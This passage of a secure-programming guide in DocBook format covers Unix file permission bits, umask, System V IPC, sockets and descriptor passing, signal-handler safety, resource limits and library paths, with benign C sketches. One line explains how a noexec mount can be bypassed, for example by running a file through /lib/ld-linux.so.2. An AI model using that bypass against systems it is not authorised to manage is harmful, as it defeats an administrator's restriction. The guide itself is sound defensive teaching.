``sticky'' bit - when set on a directory, unlinks (removes) and
renames of files in that directory are limited to
the file owner, the directory owner, or root privileges.
This is a very common Unix extension
and is specified in the
Open Group's Single Unix Specification version 2.
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/chmod.html -->
Old versions of Unix called this the ``save program text'' bit and used this
to indicate executable files that should stay in memory.
Systems that did this ensured that only root could set this bit
(otherwise users could have crashed systems by forcing ``everything''
into memory).
In Linux, this bit has no effect on ordinary files and ordinary users
can modify this bit on the files they own:
Linux's virtual memory management makes this old use irrelevant.
</para>
</listitem>
<listitem>

<para>
setuid, setgid - when set on an executable file,
executing the file will set the process' effective UID or effective GID
to the value of the file's owning UID or GID (respectively).
All Unix-like systems support this.
In Linux and System V systems,
when setgid is set on a file that does not have any execute privileges,
this indicates a file that is subject to mandatory locking
during access (if the filesystem is mounted to support mandatory locking);
this overload of meaning surprises many and is not universal across Unix-like
systems.
In fact, the Open Group's Single Unix Specification version 2 for chmod(3)
permits systems to ignore
requests to turn on setgid for files that aren't executable if such
a setting has no meaning.
In Linux and Solaris,
when setgid is set on a directory, files created in the directory will
have their GID automatically reset to that of the directory's GID.
The purpose of this approach is to support ``project directories'':
users can save files into such specially-set directories and the group
owner automatically changes.
However, setting the setgid bit on directories is not specified by
standards such as the Single Unix Specification
[Open Group 1997].
</para>
</listitem>
<listitem>

<para>
timestamps - access and modification times are stored for each
filesystem object.  However, the owner is allowed to set these values
arbitrarily (see touch(1)), so be careful about trusting this information.
All Unix-like systems support this.
</para>
</listitem>

</itemizedlist>

</para>

<para>
The following attributes are Linux-unique extensions on the ext2
filesystem, though many other filesystems have similar functionality:

<itemizedlist>
<listitem>

<para>
immutable bit - no changes to the filesystem object are allowed;
only root can set or clear this bit.
This is only supported by ext2 and is not portable across all Unix
systems (or even all Linux filesystems).
</para>
</listitem>
<listitem>

<para>
append-only bit - only appending to the filesystem object is allowed;
only root can set or clear this bit.
This is only supported by ext2 and is not portable across all Unix
systems (or even all Linux filesystems).
</para>
</listitem>

</itemizedlist>

</para>

<para>
Other common extensions include some sort of bit indicating ``cannot
delete this file''.
</para>

<para>
Many of these values can be influenced at mount time, so that, for example,
certain bits can be treated as though they had a certain value (regardless
of their values on the media).
See mount(1) for more information about this.
These bits are useful, but be aware that some of these are intended to
simplify ease-of-use and aren't really sufficient to prevent certain actions.
For example, on Linux, mounting with ``noexec'' will disable execution of
programs on that file system; as noted in the manual, it's
intended for mounting filesystems containing binaries for incompatible systems.
On Linux,
this option won't completely prevent someone from running the files;
they can copy the files somewhere else to run them, or even use the
command ``/lib/ld-linux.so.2'' to run the file directly.
</para>

<para>
Some filesystems don't support some of these access control values; again,
see mount(1) for how these filesystems are handled.
In particular, many Unix-like systems support MS-DOS disks, which by
default support very few of these attributes (and there's no standard
way to define these attributes).
In that case, Unix-like systems emulate the standard attributes
(possibly implementing them through special on-disk files), and these
attributes are generally influenced by the mount(1) command.
</para>

<para>
It's important to note that, for adding and removing files, only the
permission bits and owner of the file's <emphasis>directory</emphasis>
really matter unless the Unix-like system supports
more complex schemes (such as POSIX ACLs).
Unless the system has other extensions, and stock Linux 2.2 doesn't,
a file that has no permissions in its permission bits
can still be removed if its containing directory permits it.
Also, if an ancestor directory permits its children to be changed by some
user or group, then any of that directory's descendants can be replaced by
that user or group.
</para>
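
<para>
The point about directory permissions is easy to check for yourself.
The following sketch creates a private directory, creates a file in it,
strips every permission bit from the file, and then removes the file anyway.
The function name remove_unwritable_file_demo() is hypothetical, and
I'm assuming that /tmp exists, is writable, and uses only the traditional
permission bits (no ACLs or similar extensions).
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 0 if a file whose permission bits are all clear could
 * still be removed because its directory permits it; returns -1
 * if the setup or the removal failed. */
int remove_unwritable_file_demo(void)
{
    char dir[] = "/tmp/fso-demo-XXXXXX";
    char path[sizeof dir + 16];

    /* mkdtemp(3) creates a new directory with mode 0700, owned by us. */
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/locked", dir);

    int fd = open(path, O_CREAT | O_EXCL | O_WRONLY, 0600);
    if (fd < 0) {
        rmdir(dir);
        return -1;
    }
    int rc = fchmod(fd, 0);            /* the file now has mode 0000 */
    close(fd);

    /* unlink(2) checks the directory's permissions, not the file's. */
    if (rc == 0)
        rc = unlink(path);
    else
        unlink(path);

    rmdir(dir);
    return rc;
}
```
]]></programlisting>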

<para>
The draft IEEE POSIX standard on security defines a technique for
true ACLs that support a list of users and groups with their permissions.
Unfortunately, this is not widely supported nor supported exactly the
same way across Unix-like systems.
Stock Linux 2.2, for example, has neither ACLs nor POSIX capability
values in the filesystem.
</para>

<para>
It's worth noting that in Linux, the Linux ext2
filesystem by default reserves a small amount of space for the root user.
This is a partial defense against denial-of-service attacks; even if a user
fills a disk that is shared with the root user, the root user has a little
space left over (e.g., for critical functions).
The default is 5&percnt; of the filesystem space; see mke2fs(8),
in particular its ``-m'' option.
</para>

</sect2>

<sect2 id="fso-initial-values">
<title>Creation Time Initial Values</title>

<para>
At creation time, the following rules apply.
On most Unix systems, when a new filesystem object is created via creat(2)
or open(2), the FSO UID is set to the process' EUID and the FSO's GID is
set to the process' EGID.
Linux works slightly differently due to its FSUID
extensions; the FSO's UID is set to the process' FSUID, and the FSO GID
is set to the process' FSGID; if the
containing directory's setgid bit is set or the filesystem's
``GRPID'' flag is set, the FSO GID is actually set to the
GID of the containing directory.
Many systems, including Sun Solaris and Linux, also support the
setgid directory extensions.
As noted earlier,
this special case supports ``project'' directories: to make a ``project''
directory, create a special group for the project,
create a directory for the project owned by that group, then make the
directory setgid: files placed there
are automatically owned by the project.
Similarly, if a new subdirectory is created inside a directory with the
setgid bit set (and the filesystem GRPID isn't set), the new subdirectory
will also have its setgid bit set (so that project subdirectories will
``do the right thing''); in all other cases the setgid bit is clear for a new file.
This is the rationale for the ``user-private group'' scheme
(used by Red Hat Linux and some others).
In this scheme,
every user is a member of a ``private'' group with just themselves as members,
so their defaults can permit the group to read and write any file
(since they're the only member of the group).
Thus, when the file's group membership
is transferred this way, read and write privileges
are transferred too.
<!-- http://www.redhat.com/support/manuals/RHL-6.2-Manual/ref-guide/s1-sysadmin-usr-grps.html -->
FSO basic access control values (read, write, execute) are computed from
(requested values &amp; ~ umask of process).
New files always start with a clear sticky bit and clear setuid bit.
</para>
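
<para>
The (requested values &amp; ~ umask) computation can be observed directly.
In this sketch, mode_after_umask() is a hypothetical helper that creates
a file under a given umask and reports the permission bits the file
actually received; the pathname passed in is the caller's choice, and
I'm assuming the containing directory has no default ACL that would
override the umask.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create `path` requesting mode `requested` while the process umask
 * is `mask`, then return the permission bits the new file really
 * has.  The file is removed again and the old umask is restored.
 * Returns (mode_t)-1 on failure. */
mode_t mode_after_umask(const char *path, mode_t requested, mode_t mask)
{
    mode_t old = umask(mask);
    /* O_EXCL makes the call fail if the name already exists, so an
     * existing file or symbolic link is never reused. */
    int fd = open(path, O_CREAT | O_EXCL | O_WRONLY, requested);
    umask(old);
    if (fd < 0)
        return (mode_t)-1;

    struct stat st;
    int rc = fstat(fd, &st);
    close(fd);
    unlink(path);
    if (rc != 0)
        return (mode_t)-1;
    return st.st_mode & 07777;         /* keep only the permission bits */
}
```
]]></programlisting>
<para>
For example, requesting 0666 under a umask of 027 should yield 0640:
the umask removes write permission for the group and all permissions
for others.
</para>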

</sect2>

<sect2 id="changing-acls">
<title>Changing Access Control Attributes</title>

<para>
You can set most of these values with chmod(2), fchmod(2), or chmod(1),
but see also chown(1) and chgrp(1).
In Linux, some of the Linux-unique attributes are manipulated using chattr(1).
</para>

<para>
Note that in Linux, only root can change the owner of a given file.
Some Unix-like systems allow ordinary users to transfer ownership of their
files to another, but this causes complications and is forbidden by Linux.
For example, if you're trying to limit disk usage,
allowing such operations would allow users to claim that large files
actually belonged to some other ``victim''.
</para>

</sect2>

<sect2 id="using-acls">
<title>Using Access Control Attributes</title>

<para>
Under Linux and most Unix-like systems, the read and write
permission attributes are only checked when the file is opened; they
are not re-checked on every read or write.
Still, a large number of calls do check these attributes,
since the filesystem is so central to Unix-like systems.
Calls that check these attributes
include open(2), creat(2), link(2), unlink(2), rename(2),
mknod(2), symlink(2), and socket(2).
</para>
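
<para>
One consequence is that removing permissions from a file does not
revoke access from processes that already have it open.
The following sketch (with the hypothetical function name
read_after_chmod_demo(), and assuming a writable /tmp) opens a file,
clears all of its permission bits, and then reads from the
already-open descriptor.
</para>
<programlisting><![CDATA[
```c
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns the number of bytes read through a descriptor that was
 * opened before the file's permission bits were all cleared, or -1
 * if any step failed. */
ssize_t read_after_chmod_demo(void)
{
    char path[] = "/tmp/open-check-XXXXXX";
    char buf[8];
    ssize_t n = -1;

    /* mkstemp(3) creates the file and opens it for reading and writing. */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;

    if (write(fd, "secret", 6) == 6 &&
        fchmod(fd, 0) == 0 &&              /* file is now mode 0000 */
        lseek(fd, 0, SEEK_SET) == 0)
        n = read(fd, buf, sizeof buf);     /* still permitted */

    close(fd);
    unlink(path);
    return n;
}
```
]]></programlisting>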

</sect2>

<sect2 id="filesystem-hierarchy">
<title>Filesystem Hierarchy</title>

<para>
Over the years conventions have been built on ``what files to place where''.
Where possible,
please follow conventional use when placing information in the hierarchy.
For example, place global configuration information in /etc.
The Filesystem Hierarchy Standard (FHS) tries to
define these conventions in a logical manner, and is widely used by
Linux systems.
The FHS is an update to the previous
Linux Filesystem Structure standard (FSSTND), incorporating lessons
learned and approaches from Linux, BSD, and System V systems.
See <ulink
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink> for more information about the FHS.
A summary of these conventions is in hier(5) for Linux
and hier(7) for Solaris.
Sometimes different conventions disagree; where possible, make these
situations configurable at compile or installation time.
</para>

<para>
I should note that the FHS has been adopted by the
<ulink url="http://www.linuxbase.org">Linux Standard Base</ulink> which
is developing and promoting a set of standards to increase
compatibility among Linux distributions and to enable
software applications to run on any compliant Linux system.
</para>

</sect2>

</sect1>

<sect1 id="sysv-ipc">
<title>System V IPC</title>

<para>
Many Unix-like systems, including
Linux and System V systems, support System V interprocess communication
(IPC) objects.
Indeed System V IPC is required by the
Open Group's Single UNIX Specification, Version 2
[Open Group 1997].
<!-- ???: how about BSD variants? -->
<!-- ???: is this the same as "POSIX shm"? John Levon asked; I think
  they're the same but I'm not certain. -->
System V IPC objects can be one of three kinds:
System V message queues, semaphore sets, and shared memory segments.
Each such object has the following attributes:

<itemizedlist>
<listitem>

<para>
read and write permissions for each of creator, creator group, and
others.
</para>
</listitem>
<listitem>

<para>
creator UID and GID - UID and GID of the creator of the object.
</para>
</listitem>
<listitem>

<para>
owning UID and GID - UID and GID of the owner of the
object (initially equal to the creator UID).
</para>
</listitem>

</itemizedlist>

</para>

<para>
When accessing such objects, the rules are as follows:

<itemizedlist>
<listitem>

<para>
if the process has root privileges, the access is granted.
</para>
</listitem>
<listitem>

<para>
if the process' EUID is the owner or creator UID of the object,
then the appropriate creator permission bit is
checked to see if access is granted.
</para>
</listitem>
<listitem>

<para>
if the process' EGID is the owner or creator GID of the object,
or one of the process' groups is the owning or creating GID of the object,
then the appropriate creator group permission bit is checked for access.
</para>
</listitem>
<listitem>

<para>
otherwise, the appropriate ``other'' permission bit is checked
for access.
</para>
</listitem>

</itemizedlist>

</para>

<para>
Note that root, or a process with the EUID of either the owner or creator,
can set the owning UID and owning GID and/or remove the object.
More information is available in ipc(5).
</para>
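
<para>
As a rough illustration of these attributes, here is a minimal sketch
that creates a private shared memory segment readable and writable only
by its owner, reads back the creator and owner IDs with shmctl(2),
and then removes the segment.
The function name demo&lowbar;private&lowbar;shm and the 4096-byte size are
hypothetical choices made for this example only.
<programlisting>
<![CDATA[
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Hypothetical helper: create a private segment with mode
   0600, print its ownership attributes, then remove it.
   Returns the permission bits, or -1 on error. */
int demo_private_shm(void)
{
  struct shmid_ds ds;
  int mode;
  int id = shmget(IPC_PRIVATE, 4096, IPC_CREAT | 0600);

  if (id == -1) {
    perror("shmget");
    return -1;
  }
  if (shmctl(id, IPC_STAT, &ds) == -1) {
    perror("shmctl(IPC_STAT)");
    shmctl(id, IPC_RMID, NULL);
    return -1;
  }
  mode = (int) (ds.shm_perm.mode & 0777);
  printf("creator uid=%ld gid=%ld, owner uid=%ld gid=%ld, "
         "mode=%o\n",
         (long) ds.shm_perm.cuid, (long) ds.shm_perm.cgid,
         (long) ds.shm_perm.uid, (long) ds.shm_perm.gid,
         (unsigned) mode);

  /* System V IPC objects persist until explicitly removed. */
  if (shmctl(id, IPC_RMID, NULL) == -1) {
    perror("shmctl(IPC_RMID)");
    return -1;
  }
  return mode;
}
]]>
</programlisting>
Choosing the narrowest permission bits that still work (here 0600)
keeps other users from attaching to the segment.
</para>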

</sect1>

<sect1 id="sockets">
<title>Sockets and Network Connections</title>

<para>
<!-- Sockets are supported by System V according to Linux's socket(2) -->
Sockets are used for communication, particularly over a network.
Sockets were originally developed by the
BSD branch of Unix systems, but they are generally portable to other
Unix-like systems: Linux and System V variants support sockets as well, and
socket support is required by the Open Group's
Single Unix Specification [Open Group 1997].
System V systems traditionally used a different (incompatible) network
communication interface, but it's worth noting that systems like Solaris
include support for sockets.
Socket(2) creates an endpoint for communication and returns a descriptor,
in a manner similar to open(2) for files.
The parameters for socket specify the protocol family and type,
such as the Internet domain (TCP/IP version 4), Novell's IPX,
or the ``Unix domain''.
A server then typically calls bind(2), listen(2), and accept(2) or select(2).
A client typically calls bind(2) (though that may be omitted) and
connect(2).
See these routines' respective man pages for more information.
It can be difficult to understand how to use sockets from their man pages;
you might want to consult other papers such as
Hall "Beej" [1999]
to learn how these calls are used together.
</para>
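
<para>
The call sequence above can be sketched in a single function.
This is only an illustration under stated assumptions: a real server
and client are normally separate processes, and the loopback address,
the kernel-chosen port (port 0), and the function name
demo&lowbar;tcp&lowbar;loopback are choices made for this example.
<programlisting>
<![CDATA[
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

/* Hypothetical helper: the "server" side does socket, bind,
   listen and accept; the "client" side does socket and
   connect.  Returns 0 if a connection was made, else -1. */
int demo_tcp_loopback(void)
{
  struct sockaddr_in addr;
  socklen_t len = sizeof(addr);
  int srv, cli = -1, conn = -1, ok = -1;

  srv = socket(AF_INET, SOCK_STREAM, 0);
  if (srv == -1)
    return -1;

  memset(&addr, 0, sizeof(addr));
  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  addr.sin_port = htons(0);   /* let the kernel pick a port */

  if (bind(srv, (struct sockaddr *) &addr,
           sizeof(addr)) == 0 &&
      listen(srv, 1) == 0 &&
      getsockname(srv, (struct sockaddr *) &addr,
                  &len) == 0) {
    /* addr now holds the port the kernel assigned */
    cli = socket(AF_INET, SOCK_STREAM, 0);
    if (cli != -1 &&
        connect(cli, (struct sockaddr *) &addr,
                sizeof(addr)) == 0) {
      conn = accept(srv, NULL, NULL);
      if (conn != -1)
        ok = 0;
    }
  }
  if (conn != -1)
    close(conn);
  if (cli != -1)
    close(cli);
  close(srv);
  return ok;
}
]]>
</programlisting>
</para>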

<para>
The ``Unix domain sockets'' don't actually represent a network protocol; they
can only connect to sockets on the same machine
(at the time of this writing for the standard Linux kernel).
When used as a stream, they are fairly similar to named pipes, but with
significant advantages.
In particular, a Unix domain stream socket is connection-oriented; each new connection to
the socket results in a new communication channel, a very different situation
than with named pipes.
Because of this property, Unix domain sockets are often used instead of
named pipes to implement IPC for many important services.
Just like you can have unnamed pipes, you can have unnamed Unix domain sockets
using socketpair(2); unnamed Unix domain sockets
are useful for IPC in a way similar to unnamed pipes.
</para>
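
<para>
Here is a minimal sketch of an unnamed Unix domain socket pair created
with socketpair(2).
For brevity it writes and reads within one process; in practice the two
ends are usually shared with a child created by fork(2).
The function name demo&lowbar;socketpair and the message text are
hypothetical.
<programlisting>
<![CDATA[
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: send a short message through one end
   of an unnamed Unix domain socket pair and read it back
   from the other end.
   Returns 0 if the message arrived intact, else -1. */
int demo_socketpair(void)
{
  static const char msg[] = "hello";
  char buf[sizeof(msg)];
  int sv[2];
  int ok = -1;

  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
    return -1;

  if (write(sv[0], msg, sizeof(msg))
        == (ssize_t) sizeof(msg) &&
      read(sv[1], buf, sizeof(buf))
        == (ssize_t) sizeof(buf) &&
      memcmp(msg, buf, sizeof(msg)) == 0)
    ok = 0;

  close(sv[0]);
  close(sv[1]);
  return ok;
}
]]>
</programlisting>
</para>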

<para>
There are several interesting security implications of Unix domain sockets.
First, although Unix domain sockets can appear in the filesystem and can have
stat(2) applied to them, you can't use open(2) to open them (you have
to use the socket(2) and friends interface).
Second, Unix domain sockets can be used to pass
file descriptors between processes (not just the file's contents).
This odd capability, not available in any other IPC mechanism, has been used
to hack all sorts of schemes (the descriptors can basically
be used as a limited version of the
``capability'' in the computer science sense of the term).
File descriptors are sent using sendmsg(2), where the message's
msg&lowbar;control field points to an array of control message headers
(the msg&lowbar;controllen field must specify the number of bytes contained in the array).
Each control message is a struct cmsghdr followed by data, and for this purpose
you want the cmsg&lowbar;type set to SCM&lowbar;RIGHTS.
A file descriptor is retrieved through recvmsg(2) and then tracked down in
the analogous way.
Frankly, this feature is quite baroque, but it's worth knowing about.
</para>
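
<para>
The descriptor-passing steps just described can be sketched as follows.
This is an illustration rather than a definitive implementation:
the function names send&lowbar;fd and recv&lowbar;fd are hypothetical,
exactly one descriptor is passed per message, and a single dummy data
byte accompanies the control message.
<programlisting>
<![CDATA[
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: send descriptor fd_to_send over the
   Unix domain socket sock.  Returns 0 on success, else -1. */
int send_fd(int sock, int fd_to_send)
{
  struct msghdr msg;
  struct iovec iov;
  struct cmsghdr *cmsg;
  char dummy = 'x';          /* one byte of ordinary data */
  union {
    struct cmsghdr align;    /* forces suitable alignment */
    char buf[CMSG_SPACE(sizeof(int))];
  } ctl;

  memset(&msg, 0, sizeof(msg));
  memset(&ctl, 0, sizeof(ctl));
  iov.iov_base = &dummy;
  iov.iov_len = 1;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_control = ctl.buf;
  msg.msg_controllen = sizeof(ctl.buf);

  cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(sizeof(int));
  memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

  return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one descriptor from sock.
   Returns the new descriptor, or -1 on error. */
int recv_fd(int sock)
{
  struct msghdr msg;
  struct iovec iov;
  struct cmsghdr *cmsg;
  char dummy;
  int fd = -1;
  union {
    struct cmsghdr align;
    char buf[CMSG_SPACE(sizeof(int))];
  } ctl;

  memset(&msg, 0, sizeof(msg));
  memset(&ctl, 0, sizeof(ctl));
  iov.iov_base = &dummy;
  iov.iov_len = 1;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_control = ctl.buf;
  msg.msg_controllen = sizeof(ctl.buf);

  if (recvmsg(sock, &msg, 0) != 1)
    return -1;

  /* Accept only the control message we expect. */
  cmsg = CMSG_FIRSTHDR(&msg);
  if (cmsg != NULL &&
      cmsg->cmsg_level == SOL_SOCKET &&
      cmsg->cmsg_type == SCM_RIGHTS &&
      cmsg->cmsg_len == CMSG_LEN(sizeof(int)))
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
  return fd;
}
]]>
</programlisting>
The receiver gets a new descriptor number that refers to the same open
file as the sender's descriptor, so a receiving program should check
what it was handed before trusting it.
</para>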

<para>
Linux 2.2 and later
supports an additional feature in Unix domain sockets: you can
acquire the peer's ``credentials'' (the pid, uid, and gid).
Here's some sample code:
<programlisting width="61">
<![CDATA[
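 /* fd= file descriptor of Unix domain socket connected
    to the client you wish to identify.
    Needs <stdio.h> and <sys/socket.h>; with glibc, define
    _GNU_SOURCE first so that struct ucred is declared. */

 struct ucred cr;
 socklen_t cl=sizeof(cr);

 if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl)==0) {
   printf("Peer's pid=%d, uid=%d, gid=%d\n",
           (int) cr.pid, (int) cr.uid, (int) cr.gid);
 }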
]]>
</programlisting>
</para>

<para>
Standard Unix convention is that binding to
TCP and UDP local port numbers less than 1024 requires
root privilege, while any process can bind to an unbound port number
of 1024 or greater.
Linux follows this convention;
more specifically, Linux requires a process to have the
capability CAP&lowbar;NET&lowbar;BIND&lowbar;SERVICE to bind to a port number less than 1024;
this capability is normally only held by processes with an EUID of 0.
The adventurous can check this by examining the Linux source code;
in Linux 2.2.12, it's in file <filename>/usr/src/linux/net/ipv4/af&lowbar;inet.c</filename>,
function inet&lowbar;bind().
</para>

</sect1>

<sect1 id="signals">
<title>Signals</title>

<para>
Signals are a simple form of ``interruption'' in the Unix-like OS world,
and are an ancient part of Unix.
A process can send a ``signal'' to another process (say using
kill(1) or kill(2)), and that other process would receive and
handle the signal asynchronously.
For a process to have permission to send an arbitrary
signal to some other process,
the sending process must either have root privileges, or
the real or effective user ID of the sending process
must equal the real or saved set-user-ID of the receiving process.
However, some signals can be sent in other ways.
In particular, SIGURG can be delivered over a network through the
TCP/IP out-of-band (OOB) message.
</para>

<para>
Although signals are an ancient part of Unix, they've had different
semantics in different implementations.
Basically, they involve questions such as ``what happens when a signal
occurs while handling another signal''?
The older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries.
Calling C library functions is often unsafe within a
signal handler, and even some system calls aren't safe;
you need to examine the documentation for each call you make to see
if it promises to be safe to call inside a signal handler.
For more information, see the glibc FAQ (on some systems a local
copy is available at <filename>/usr/doc/glibc-*/FAQ</filename>).
</para>

<para>
For new programs, just use the POSIX signal system
(which in turn was based on BSD work); this set is widely supported
and doesn't have some of the problems
that some of the older signal systems did.
The POSIX signal system is based on using the sigset&lowbar;t datatype,
which can
be manipulated through a set of operations: sigemptyset(),
sigfillset(), sigaddset(), sigdelset(), and sigismember().
You can read about these in sigsetops(3).
Then use sigaction(2), sigprocmask(2),
sigpending(2), and sigsuspend(2) to set up and manipulate signal handling
(see their man pages for more information).
</para>
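
<para>
As a small illustration of these calls, the following sketch blocks
SIGUSR1, raises it, and uses sigpending(2) to confirm that the signal is
held pending instead of being delivered.
The function name demo&lowbar;block&lowbar;and&lowbar;pending and the choice
of SIGUSR1 are hypothetical, and the sketch assumes a single-threaded
program.
<programlisting>
<![CDATA[
#include <signal.h>
#include <string.h>

/* Hypothetical helper.  Returns 1 if SIGUSR1 was pending
   while blocked, 0 if it was not, -1 on error. */
int demo_block_and_pending(void)
{
  sigset_t block, old, pending;
  struct sigaction ign, oldact;
  int was_pending;

  sigemptyset(&block);
  sigaddset(&block, SIGUSR1);
  if (sigprocmask(SIG_BLOCK, &block, &old) == -1)
    return -1;

  raise(SIGUSR1);      /* generated, but held pending */

  sigemptyset(&pending);
  if (sigpending(&pending) == -1)
    return -1;
  was_pending = sigismember(&pending, SIGUSR1);

  /* Setting the action to SIG_IGN discards the pending
     signal, so restoring the old mask delivers nothing. */
  memset(&ign, 0, sizeof(ign));
  ign.sa_handler = SIG_IGN;
  sigemptyset(&ign.sa_mask);
  if (sigaction(SIGUSR1, &ign, &oldact) == -1)
    return -1;

  sigprocmask(SIG_SETMASK, &old, NULL);
  sigaction(SIGUSR1, &oldact, NULL);
  return was_pending;
}
]]>
</programlisting>
</para>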

<para>
In general, make any signal handlers very short and simple, and
look carefully for race conditions.
Signals, since they are by nature asynchronous,
can easily cause race conditions.
</para>

<para>
A common convention exists for servers: if you receive SIGHUP, you should
close any log files, reopen and reread configuration files, and then
re-open the log files.
This supports reconfiguration without halting the server and
log rotation without data loss.
If you are writing a server where this convention makes sense,
please support it.
</para>

<para>
Michal Zalewski [2001] has written an excellent tutorial on how
signal handlers are exploited, and has recommendations for how to
eliminate signal race problems.
I encourage looking at his summary for more information; here are
my recommendations, which are similar to Michal's work:
<itemizedlist>
<listitem><para>
Where possible, have your signal handlers unconditionally set a specific flag
and do nothing else.
</para></listitem>
<listitem><para>
If you must have more complex signal handlers,
use only calls specifically designated as being safe for use
in signal handlers.
In particular,
don't use malloc() or free() in C (which on most systems
aren't protected against signals), nor the many functions that depend on them
(such as the printf() family and syslog()).
You could try to ``wrap'' calls to insecure library calls with a check
to a global flag (to avoid re-entry), but I wouldn't recommend it.
</para></listitem>
<listitem><para>
Block signal delivery during all non-atomic operations in the program, and
block signal delivery inside signal handlers.
</para></listitem>
</itemizedlist>
</para>
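
<para>
The first and third recommendations can be sketched together, using
SIGHUP as the example signal.
This is a minimal sketch, not a complete server: the names
got&lowbar;sighup, on&lowbar;sighup, install&lowbar;sighup&lowbar;handler, and
take&lowbar;sighup are hypothetical, and the work of reopening log files
or rereading configuration is left to the caller.
<programlisting>
<![CDATA[
#include <signal.h>
#include <string.h>

/* The only state the handler touches. */
static volatile sig_atomic_t got_sighup = 0;

/* Handler: set a flag and do nothing else. */
static void on_sighup(int signo)
{
  (void) signo;
  got_sighup = 1;
}

/* Install the handler; every other signal is blocked while
   it runs.  Returns 0 on success, -1 on error. */
int install_sighup_handler(void)
{
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = on_sighup;
  sigfillset(&sa.sa_mask);
  sa.sa_flags = SA_RESTART;
  return sigaction(SIGHUP, &sa, NULL);
}

/* Call from the main loop, outside signal context.
   Returns 1 if SIGHUP arrived since the last call, else 0.
   SIGHUP is blocked while the flag is read and cleared so
   that the two steps cannot be interrupted by the handler. */
int take_sighup(void)
{
  sigset_t block, old;
  int seen;

  sigemptyset(&block);
  sigaddset(&block, SIGHUP);
  sigprocmask(SIG_BLOCK, &block, &old);
  seen = got_sighup;
  got_sighup = 0;
  sigprocmask(SIG_SETMASK, &old, NULL);
  return seen;
}
]]>
</programlisting>
A server's main loop would call take&lowbar;sighup() periodically and,
when it returns 1, do the real work in ordinary (non-handler) code.
</para>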

</sect1>

<sect1 id="quotas">
<title>Quotas and Limits</title>

<para>
Many Unix-like systems have
mechanisms to support filesystem quotas and process resource limits.
This certainly includes Linux.
These mechanisms are particularly useful for preventing denial of service
attacks; by limiting the resources available to each user, you can make
it hard for a single user to use up all the system resources.
Be careful with terminology here, because both filesystem quotas
and process resource limits have ``hard'' and
``soft'' limits but the terms mean slightly different things.
</para>

<para>
You can define storage (filesystem) quota limits on each mountpoint
for the number of blocks of storage and/or the number of unique files
(inodes) that can be used, and you can set such limits for a given user
or a given group.
A ``hard'' quota limit is a never-to-exceed limit, while a
``soft'' quota can be temporarily exceeded.
See quota(1), quotactl(2), and quotaon(8).
</para>

<para>
The rlimit mechanism supports a large number of process quotas, such as
file size, number of child processes, number of open files, and so on.
There is a ``soft'' limit (also called the current limit) and a
``hard limit'' (also called the upper limit).
The soft limit cannot be exceeded at any time, but through calls it can
be raised up to the value of the hard limit.
See getrlimit(2), setrlimit(2), getrusage(2), sysconf(3), and
ulimit(1).
Note that there are several ways to set these limits, including the
PAM module pam&lowbar;limits.
</para>
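
<para>
Here is a minimal sketch of adjusting a soft limit with getrlimit(2)
and setrlimit(2).
The function name set&lowbar;nofile&lowbar;soft&lowbar;limit is hypothetical,
and the limit on open files (RLIMIT&lowbar;NOFILE) is just one example of
a resource that can be limited this way.
<programlisting>
<![CDATA[
#include <sys/time.h>
#include <sys/resource.h>

/* Hypothetical helper: set the soft limit on open files to
   `wanted', clamped so it never exceeds the hard limit.
   Returns 0 on success, -1 on error. */
int set_nofile_soft_limit(rlim_t wanted)
{
  struct rlimit rl;

  if (getrlimit(RLIMIT_NOFILE, &rl) == -1)
    return -1;
  if (rl.rlim_max != RLIM_INFINITY && wanted > rl.rlim_max)
    wanted = rl.rlim_max;
  rl.rlim_cur = wanted;       /* hard limit left unchanged */
  return setrlimit(RLIMIT_NOFILE, &rl);
}
]]>
</programlisting>
A server might call something like this early in start-up, before
handling untrusted input, so that a runaway request cannot consume more
than the chosen amount of the resource.
</para>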

</sect1>

<sect1 id="dlls">
<title>Dynamically Linked Libraries</title>

<para>
Practically all programs depend on libraries to execute.
In most modern Unix-like systems, including Linux,
programs are by default compiled to use <emphasis remap="it">dynamically linked libraries</emphasis>
(DLLs).
That way, you can update a library and all the programs using that library
will use the new (hopefully improved) version if they can.
</para>

<para>
Dynamically linked libraries are typically placed in one of a few special
directories. The usual directories include
<filename>/lib</filename>, <filename>/usr/lib</filename>, <filename>/lib/security</filename>
for PAM modules,
<filename>/usr/X11R6/lib</filename> for X-windows, and <filename>/usr/local/lib</filename>.
You should use these standard conventions in your programs; in particular,
except during debugging, you shouldn't use a value computed from the
current directory as a source for dynamically linked libraries (an
attacker may be able to add their own choice ``library'' values).
</para>

<para>
There are special conventions for naming libraries and having symbolic
links for them, with the result that you can update libraries and still
support programs that want to use old, non-backward-compatible versions
of those libraries.
There are also ways to override specific libraries or even just
specific functions in a library when executing a particular program.
This is a real advantage of Unix-like systems over
Windows-like systems; I believe Unix-like systems have a much better system
